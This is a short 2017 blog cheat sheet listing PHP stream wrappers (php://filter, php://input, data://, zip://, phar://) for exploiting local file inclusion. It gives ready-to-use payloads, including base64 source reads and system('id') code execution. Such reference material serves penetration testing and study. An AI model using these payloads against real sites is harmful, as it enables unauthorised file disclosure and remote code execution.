Exploit LFI with PHP Protocols / Wrappers
2017. 11. 1. 21:16
Exploit LFI with PHP Protocols / Wrappers
본 글의 내용은 여기에서 많이 참고하였습니다.
file://
- controllable function : x
- allow_url_include : Off
- vulnerability type : LFI / File Manipulation
glob://
- controllable function : x
- allow_url_include : Off
- vulnerability type : Directory Traversal
php://filter/read
- controllable function : include
- allow_url_include : Off
- vulnerability type : File Disclosure
php://filter/read=convert.base64-encode/resource=index.php
php://filter/write
- controllable function : file_put_contents
- allow_url_include : Off
- vulnerability type : Encoding
file_put_contents("php://filter/write=string.rot13/resource=x.txt","content");
php://input
- controllable function : include
- allow_url_include : On
- vulnerability type : RCE
<?php echo base64_encode(file_get_contents("solution.php"));?>
<?php system('cat x.php');?>
data://
- controllable function : include
- allow_url_include : On
- vulnerability type : RCE
data:text/plain,<?php system("id")?>
data:text/plain;base64,PD9waHAgc3lzdGVtKCJpZCIpPz4=
zip://
- controllable function : include + uploaded file
- allow_url_include : Off
- vulnerability type : RCE
zip://<Absolute path>
phar://
- controllable function : include + uploaded file
- allow_url_include : Off
- RCE
PHP Versin >= 5.3